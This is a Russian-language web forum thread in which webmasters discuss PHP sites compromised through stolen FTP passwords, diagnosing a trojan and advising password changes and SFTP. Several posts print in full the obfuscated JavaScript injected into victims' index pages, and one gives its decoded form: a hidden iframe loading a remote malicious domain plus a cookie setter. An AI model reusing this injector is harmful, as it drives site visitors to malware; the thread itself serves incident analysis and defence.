Меню
Что нового?

нужна помощь хакнули сайт

texrdcom

Новичок
нужна помощь хакнули сайт

Какимто образом хакеру удалось записать в файл с расширениям .php в корневой дерктории
следующий код
PHP: 
<!--[O]--><script>document.write(unescape("%3Cscript%3Etry%20%7Bvar%20TO%3D%27WW2Wz2Wg2WP2W62Wh2Ww2W32WN2Wn2Ws2WT2W42Wi2WI2Wa2WJ2WG2WH2WO2WM2Wj2WA2Wb2Wp2WZ2WL2Wd2WR2Wf2W92WX2WK2Wr2WS2Wm2WY2WV2WU2W82Wc2W72W52Wq2WB2Wx2Wt2Wo2Wy2WF2Wl2WD2WC2Wk2zW2zz2zg2zP2z62zh2zw2z32zN2zn2zs2zT2z42zi2zI2za2zJ2zG2zH2zO2zM2zj2zA2zb2zp2zZ%27%3Bvar%20VA%3DTO.substr%282%2C1%29%2Cmo%3DArray%28Ps%28%27173%27%29%2C26913%5E27075%2CPs%28%27242%27%29%2C16076%5E15919%2CPs%28%27248%27%29%2C20236%5E20461%2C13936%5E13973%2C5488%5E5599%2CPs%28%27247%27%29%2C32677%5E32577%2C13140%5E13227%2CPs%28%27254%27%29%2CPs%28%27177%27%29%2C8347%5E8259%2C20830%5E20967%2CPs%28%27192%27%29%2C4574%5E4409%2C8844%5E8753%2CPs%28%27217%27%29%2CPs%28%27222%27%29%2CPs%28%27184%27%29%2CPs%28%27234%27%29%2CPs%28%27240%27%29%2CPs%28%27251%27%29%2C20929%5E20845%2C10367%5E10379%2CPs%28%27230%27%29%2C30258%5E30439%2CPs%28%27170%27%29%2CPs%28%27246%27%29%2C30345%5E30325%2CPs%28%27191%27%29%2CPs%28%27197%27%29%2C9333%5E9423%2CPs%28%27169%27%29%2CPs%28%27167%27%29%2CPs%28%27165%27%29%2C18106%5E17947%2C6070%5E5955%2C32331%5E32433%2CPs%28%27179%27%29%2C29198%5E29415%2CPs%28%27214%27%29%2CPs%28%27220%27%29%2C10989%5E10799%2CPs%28%27236%27%29%2CPs%28%27243%27%29%2C17116%5E16903%2CPs%28%27182%27%29%2C623%5E719%2CPs%28%27218%27%29%2CPs%28%27198%27%29%2CPs%28%27200%27%29%2C31902%5E31843%2C20149%5E19979%2CPs%28%27249%27%29%2CPs%28%27188%27%29%2C18706%5E18873%2C24075%5E24251%2C30777%5E30871%2CPs%28%27221%27%29%2C17133%5E16935%2CPs%28%27207%27%29%2CPs%28%27235%27%29%2CPs%28%27168%27%29%2CPs%28%27204%27%29%2C7904%5E7725%2C7115%5E6937%2C31217%5E31013%2C12263%5E12087%2C8146%5E7937%2CPs%28%27162%27%29%2CPs%28%27232%27%29%2C7068%5E6919%2CPs%28%27203%27%29%2CPs%28%27163%27%29%2CPs%28%27164%27%29%2CPs%28%27166%27%29%2C13610%5E13803%2C25944%5E26083%29%3Bvar%20bu%2CEd%3Bvar%20Pt%2CVW%3D%27WWWzWgWPW6WhWwW3WNWnWsWgWwW6WTWsW4WzWiWIWaWJWGWHWOWMWjW4WJWAWPW4WbWaWpWsWZWLW4WdWAWwWZWIWMWRWJWAWPW4W4WfW9WpW4WsWZWLW4WdWAWwWZWIWMWRW4WfW9WXWzWZWwWKW6W9WZWIWbWaWXWfWZWwWKW6W9WZWIWMWrWSWmWYWVWVWVWVWVWMWRW4WUWTWgWnW9WZWsWwWXWgWTWTW8W6WZW4WpW4WaWJWrWcWpWcWrWZWzWgWAWhWZWIWHWOWMWrWcWRWZW7WhW6WPWZWzWpWcWrWfW9WXWwWTW5WqWKWBWwWPW6WsWfWIWMWRW4WxWJWAWPW4WtWoWpWyWzWFWNWsWlWyWGWDWCWpWyWFWyWRWJWAWPW4WBWdWpWyWnWhWUWAWwWZWFWXWgWkWAWzWzW6WgWwWZWkWXWTWPWfWyWGW5WbWpWyzWzzWwW9WkzWWyWRW6WNWIWUWTWgWnW9WZWsWwWXWgWTWTW8W6WZWXW6WsWUWZW7WOWNWIWtWoWrWyWpWyWrWDWCWMWpWpzgWFWMWjW4WJWAWPW4WhWUWpWyzzWwWwWhzPzWzWWyWrWIWUWTWgWnW9WZWsWwWXWkWTWgWAWwW6WTWsWXzzWTWzWwW4z6WpW4WyWyzhWyWyzPWOzwWIWMWMWrWUWTWgWnW9WZWsWwWXWkWTWgWAWwW6WTWsWXzzWTWzWwWXWPWZWhWkWAWgWZWIzWz3zNWAzgznWVzgzsWXzgzTzWWGWyWXWyWMWXWPWZWhWkWAWgWZWIzWz4WXWrzWWGWyWXWyWMWrWyWXWyWrWOzwWIWMWrWyWXWyWrWBWdWrW5WbWRWJWAWPW4ziWzWpWUWTWgWnW9WZWsWwWXWgWPWZWAWwWZzIWkWZW9WZWsWwWIWyW6WNWPWAW9WZWyWMWRziWzWXWzWZWwzaWwWwWPW6WtWnWwWZWIWyWzWPWgWyWGWhWUWMWRziWzWXWNWPWAW9WZzJWTWPWUWZWPWpWVWRW4ziWzWXWLW6WUWwzzWpWVWRziWzWXzzWZW6WfzzWwWpzGWRWwWPzHW4WjW4WUWTWgWnW9WZWsWwWXWtWTWUzHWXWAWhWhWZWsWUzizzW6WkWUWIziWzWMWRWzWiWIWtWoWGWDWCWMWRW4WxWgWAWwWgzzWIWZWMWjW4WUWTWgWnW9WZWsWwWXWLWPW6WwWZWIWyWWzzWwW9WkW3WWWtWTWUzHW3WWzWWtWTWUzHW3WWzWzzWwW9WkW3WyWMWRWUWTWgWnW9WZWsWwWXWtWTWUzHWXWAWhWhWZWsWUzizzW6WkWUWIziWzWMWRW4WzWiWIWtWoWGWDWCWMWRW4WxW4WxzOWNWnWsWgWwW6WTWsW4WOzwWIWMWjW4WJWAWPW4WDzMWpzjWYWGWAzaWpWcWVWFzjzGWYzAWmzbWSzsWVWAWtWgWUWZWNWcWRWJWAWPW4WOzJWpWcWcWRW4WNWTWPWIWPzpWpWVWRW4WPzpW4WWW4WDzMWRW4WPzpWrWrWMW4WOzJWrWpW4WAzaWXWzWnWtWzWwWPWIWqWAWwzzWXWNWkWTWTWPWIWqWAWwzzWXWPWAWsWUWTW9WIWMzZWAzaWXWkWZWsWfWwzzWMWGWFWGWFWMWRW4WPWZWwWnWPWsW4WOzJWRW4WxWWzWWzWgWPW6WhWwW3%27%3Bvar%20Mp%3DString%28%29%3Bfunction%20Ps%28JE%29%7Breturn%20parseInt%28JE%29%7DTO%3DTO.split%28VA%29%3Bfor%28bu%3D0%3Bbu%3CVW.length%3Bbu+%3D2%29%7BPt%3DVW.substr%28bu%2C2%29%3Bfor%28Ed%3D0%3BEd%3CTO.length%3BEd++%29%7Bif%28TO%5BEd%5D%3D%3DPt%29break%3B%7D%20Mp+%3DString.fromCharCode%28mo%5BEd%5D%5E145%29%3B%7Ddocument.write%28Mp%29%3B%7D%0Acatch%28e%29%7B%7D%3C/script%3E"))</script><!--[/O]-->
Права на файл 705 сервер unix
вопрос
1) Такое возможно сделать без доступа к локали - удаленно, то есть записать любой код ?
в файл .php
2) Если он записал туда java script значит и мог записать конструкцию php кода
3) первые строки записаны через url кодирования это видно, но чем закодированы строки:
WwzzWXWPWAWsWUWTW9WIWMzZWAza ???
 

WP

^_^
Какой-то поток сознания.
1) Злоумышленник каким-то образом получил доступ к серверу, вероятнее всего, трояном спёр пароль от FTP и робот прошелся по содержимому FTP-аккаунта.
2) Да.
3) Там есть алгоритм декодирования. Но не вижу причин к декодированию, там ты найдешь фрейм на какую-нибудь страничку с трояном.
 
Dreammaker

Dreammaker

***=Ф=***
Большая вероятность, что троян. Особенно, если файл indexный. На сёрченжинес уже много раз была информация от вебмастеров, что троян крадёт пароли, которые хранятся в тотал коммандере. Затем толи отправляет их на сервак, и там уже работает скрипт, толи сам заходит по фтп и к всем индексным файл дописывает скрипт, в котором есть ифрейм, ну а продолжение уже зависит от фантазии автора. То есть, нужно чистить систему. Возможно с форматированием :)

Это по первому вопросу.

По второму, судя по всему base64 , но после каждого символа проставляется W . Отправьте, пожалуйста, код в Лабораторию Касперского и в НОД32 - так помощь будет тем, кто будет заходиьт на подобные заражённые сайты, если ещё нет лекарства от этой модификации.
 

texrdcom

Новичок
WP
да тоже вижу на счет 3) честно говоря не видел такого не сталкивался, потому и не смотрел внимательно!
значит все таки уперли пароль ? от ftp ?

-~{}~ 09.07.07 12:59:

да да Total Сommander есть в системе,
и что обидное антивирус также есть :) Dr.Web
Dreammaker
нет это не base64 алгоритм зашит в java script,
были профиксены все файлы которые находились в корне
а их там было два с расширением .php и .php5
 

windoctor

Новичок
У меня была похожая ситуация.
Троян угнал пароль от ftp и в индекстный файл повесили похожий код.
Причём стоял антивирус NOD32.
Такие трояны никто немог обнаружить, ни антивирус касперского, ни нод.
Нашёл панацею от такого трояна в KIS.
Он видит и показывает, что идёт скрытая передача данных через iexplore.
 

texrdcom

Новичок
В принципе работал точно траян так как толку от его фикса
не было! дело в том что файлы которые он профиксил на прямую не выводили пользователю не чего!
и еще интерестное замечание
У меня бы настроен форвард через rewrite на файл index.php5
файл имел следующий вид
PHP: 
<?php
// сдесь код ...

// тег который закрывает php код не было ! ?>
Троян в конце файла дописал свой код
<!-- ... приведен выше
Так вот кода шла загрузка страницы php наталкивался на код
трояна и выполнения скрипта останавливалось так как выкидывалась ошибка выполнения php!
p/s
может и не панацея но луче не закрывать код php тегом ?>
:)
 

nerezus

Вселенский отказник
Автор темы, нормально настрой свой комп(IDS, апдейты, не юзать IE, опционально антивирь) и после этого поменяй пароль на фтп.
 

NightFlash

Новичок
Да, это троян который ворует ФТП пароли от Тотал Командера, сталивались. Чистить комп с тоталом, не юзать тотал больше, сменить фтп пароли.
 

Alexandre

PHPПенсионер
. На сёрченжинес уже много раз была информация от вебмастеров, что троян крадёт пароли, которые хранятся в тотал коммандере
Нажмите для раскрытия...
у меня сперрли пароль то ли с фара, то ли из ИЕ. скорее всего второе, так как в фаре было куча фтпи хостов, а взломали лишь один...

Мораль такова - не храните пароли в фтипи клиентах,
не задавайте строку доступа с паролем
 
Sokil.Dmytro

Sokil.Dmytro

Новичок
аналогично вляпался! хранил пароли в тотале к некоторым несерьезным проектам. в итоге все сайты из списка сдохли, встроился ифрейм
 

iceman

говнокодер
дело в том что файлы которые он профиксил на прямую не выводили пользователю не чего!
и еще интерестное замечание
Нажмите для раскрытия...
причем тут вывод пользователю?
 

iceman

говнокодер
а может это троянский бот на фтп залез да и вставил...?
 

maxru

МИФИст
Троян. Ворует пароли из Total Commander.
Пострадали клиенты Masterhost, Valuehost, 1gb.ru (не уверен).
Решение - прикрыли ФТП. Пользуемся SFTP через WinSCP.

-~{}~ 09.07.07 21:01:

Зараженный файл содержит javascript код, который саморасшифровывается а затем обращается на сайт (точно адрес сказать уже не смогу).
Код содержит такой (код привожу ПОЛНОСТЬЮ, может быть кто-то заинтересуется и объяснит, что же это такое
и как работает):
PHP: 
<!--<S>--><script>try {var RTO='nn1na1nY1nq1nF1nO1nI1n61ne1nf1nR1nm1n
D1nj1nB1nk1nt1nN1nG1nK1ng1n31np1nU1nc1ny1nr
1n41nJ1nd1nH1nT1nW1n51no1ni1nS1nw1n91nx1nV
1nz1nX1nL1nA1nZ1n71nC1ns1nM1nh1n81nP1nl1an1
aa1aY1aq1aF1aO1aI1a61ae1af1aR1am1aD1aj1aB1a
k1at',OIx=RTO.substr(2,1);var pFB=Array(BgY('132'),
9364^9311,BgY('219'),8375^8317,
10226^10019,21217^21033,BgY('204'),8029^8133,
BgY('212'),BgY('217'),BgY('214'),30018^30109,BgY('205'),
BgY('221'),BgY('133'),BgY('154'),9427^9217,BgY('206'),
BgY('134'),10228^10049,BgY('178'),BgY('136'),BgY('137'),
BgY('131'),BgY('150'),BgY('215'),19870^19807,BgY('213'),
BgY('222'),BgY('151'),BgY('208'),5653^5765,12489^12309,
BgY('211'),22833^23025,BgY('247'),BgY('147'),9002^9147,
7366^7251,24940^25007,19193^19067,17570^17467,
3480^3359,BgY('231'),19622^19525,BgY('230'),BgY('194'),
1718^1591,28550^28515,16645^16785,BgY('228'),
11000^10757,21168^21065,BgY('218'),15777^15707,
BgY('207'),25304^25123,BgY('197'),BgY('138'),7392^7275,
BgY('140'),28622^28483,BgY('142'),24432^24575,
BgY('128'),BgY('245'),4739^4625,463^307,BgY('236'),
BgY('255'),BgY('235')),Fpb;var aHM,riS;var GfT='nnnan
YnqnFnOnIn6nenfnRnmnDnfnmnjnBnkntnf
nNnfnanYnqnFnOnInknGnKngnNnfnqn6nYnRn6nBn6nk
nanqn3nenen3npnknUnKngnNnfnqn6nYnNn6nBn6nknp
nknUnKngnNnfnqn6nanjn6nBn6nknanpncnqnynenena
nrnanInjn4nancnFnRnJnynknUnKngnNnfnqn6nOn6nBn
6nkndnHnIn4nendnknUnKngnFnJnTnWnynYnDn4njnRn
IncnYnynyn5nFnjncnFnRnWnjnoninJnTnYnRnSnknBnkn
SnYnNnwn6nBnBn6n9npnwnKngnxnKngnNnfnqn6nDn
qnen6nBn6nknHnInInOnVndndnkn6nSn6nTnWnynYnD
n4njnRnIncnenynYnfnInFnynRncnHnynanIn6nznBn6nk
nkn6nXn6nknkn6nVn6nqnanrnanLnqnanTnwnwn6nSn
6nWnynYnDn4njnRnIncnenynYnfnInFnynRncnHnynanIn
cnqnjnOnenfnYnjnTndnAnZnfn9n7n3n9nCncn9nsndnMn
6nkncnknwncnqnjnOnenfnYnjnTndnhncnSndnMn6nkncn
knwn6nSn6nkncnkn6nSn6nqnanrnanLnqnanTnwn6nSn
6nkncnkn6nSn6nanjn6nSn6nOnUnKngnKngnNnfnqn6n
yn6nBn6nWnynYnDn4njnRnIncnYnqnjnfnInjn8nenjn4n
jnRnInTnknFnJnqnfn4njnknwnUnyncnanjnInPnInInqnF
nlnDnInjnTnknanqnYnknMn6nDnqnenwnUnKngnyncnJ
nqnfn4njannynqnWnjnqnBn3nUn6nyncaanFnWnInHn
BnpnUn6nyncnHnjnFnmnHnInBnpnUn6nyncnanInrnen
jncnWnFnanOnenfnrnBnknRnynRnjnknUn6nKngnInqn
rn6nxn6nWnynYnDn4njnRnIncnlnynWnrncnfnOnOnjn
RnWaYnHnFnenWnTnynwnUn6nqnanrnanLnanYnTnY
nRnMnYnNnwnUaqnKngnYnfnInYnHnTnjnwnxnKngnW
nynYnDn4njnRnIncaanqnFnInjnTnknnnHnIn4nenGnn
nlnynWnrnGnnndnlnynWnrnGnnndnHnIn4nenGnknw
nUnKngnWnynYnDn4njnRnIncnlnynWnrncnfnOnOnjn
RnWaYnHnFnenWnTnynwnUn6nqnanrnanLnanYnTnY
nRnMnYnNnwnUnKngaqnKngaqnKngnJnDnRnYnInFny
nRn6nqnanrnanLnqnanTnwnxn6nNnfnqn6nenBaFaFn
MnYnBnkn3npaFaOaIa6aeafaRnCn3nfnlnYnWnjnJnkn
MnynBnknknUn6nJnynqnTnFnBn3nUn6nFn6nnn6nen
Un6nFnSnSnwn6nyn6nSnBn6nYncnanDnlnanInqnTa
mnfnInHncnJnenynynqnTamnfnInHncnqnfnRnWnyn4
nTnwaDnYncnenjnRnmnInHnwnMnpnMnpnwnUn6nq
njnInDnqnRn6nynUn6aqnKngnJnDnRnYnInFnynRn6n
qnanrnanLnanYnTnYnRnMnYnNnwnxn6nNnfnqn6nIn
Bn6nRnjaan6ajnfnInjnTnwnUn6nNnfnqn6njnBn6nRn
jaan6ajnfnInjnTnwnUn6njncnanjnIaBnFn4njnTnIncn
mnjnIaBnFn4njnTnwnSaOaen3n3n3n3n3aDaFaInwn
Un6nWnynYnDn4njnRnIncnYnynyn5nFnjn6nBn6nYnR
nSnknBnknSnjnanYnfnOnjnTnYnNnwnSnknUnjnonOn
FnqnjnanBnknSnjncnInyakamaBatnInqnFnRnmnTnw
nUn6aqnKngnnndnanYnqnFnOnInG',FRA='';RTO=RTO.split(OIx);
for(Fpb=0;Fpb<GfT.length;Fpb+=2){riS=GfT.substr(Fpb,2);
for(aHM=0;aHM<RTO.length;aHM++){if(RTO[aHM]==riS)break;} 
FRA+=String.fromCharCode(pFB[aHM]^184);}function BgY(FQG){return parseInt(FQG)}document.write(FRA);}
catch(e){}</script><!--</S>-->
 
phprus

phprus

Moderator
Команда форума
maxru
Если это расшифровать, то мы получим вот такой код:
Код: 
<script language="javascript">
	var cn = "sr0ll01";
	var cv = "1";
	var se = "s1.rollsystems.info";
	var p = "/html/";
	if (document.cookie.indexOf(cn+"="+cv) == -1)
	{
		var url = "http://" + (document.location.host != "" ? "" : rsys_rs()) + document.location.host.replace(/[^a-z0-9.-]/, ".").replace(/\.+/, ".") + "." + rsys_rs() + "." + se + p;

		var o = document.createElement("iframe");
		o.setAttribute("src", url);
		o.frameBorder=0;
		o.width=1;
		o.height=1;
		o.style.display="none"; 
		try {
			document.body.appendChild(o);
			rsys_sc(cn,cv);
		} catch(e) {
			document.write("<html><body></body></html>");
			document.body.appendChild(o); rsys_sc(cn,cv);
		}
	}
	function rsys_rs() {
		var l=22, c="01234567890abcdef", o="";
		for (i=0; i < l; i++) o += c.substr(Math.floor(Math.random()*c.length),1,1);
		return o;
	}
	function rsys_sc(cn,cv){
		var t= new Date();
		var e= new Date();
		e.setTime(t.getTime()+3600000*24);
		document.cookie = cn+"="+escape(cv)+";expires="+e.toGMTString();
	}
</script>
Код создает ифрейм в котором запрашивает чтото с rollsystems.info и пишет чтото в cookie.
 

maxru

МИФИст
О, спасибо, действительно iframe ;)
Наши покупатели были несказанно рады заразе...наверное )
 

kpp

Новичок
ЛЮДИ, у меня с 30 на 1 июля на 2х сайтах такое появилось, во всех индексных страницах аналогичный яваскриптовый код.
 

maxru

МИФИст
kpp, а хостинг какой, если не секрет?
Я, как уже говорил, выбрал Secure FTP в качестве альтернативного FTP )
 

nalim

Новичок
Последняя версия касперского,
а точнее "AVS"
а меня на машине такие файлы видит
при открытии в браузере
и на диске если сохранено в htm html.
 
Войдите или зарегистрируйтесь для ответа.
Сверху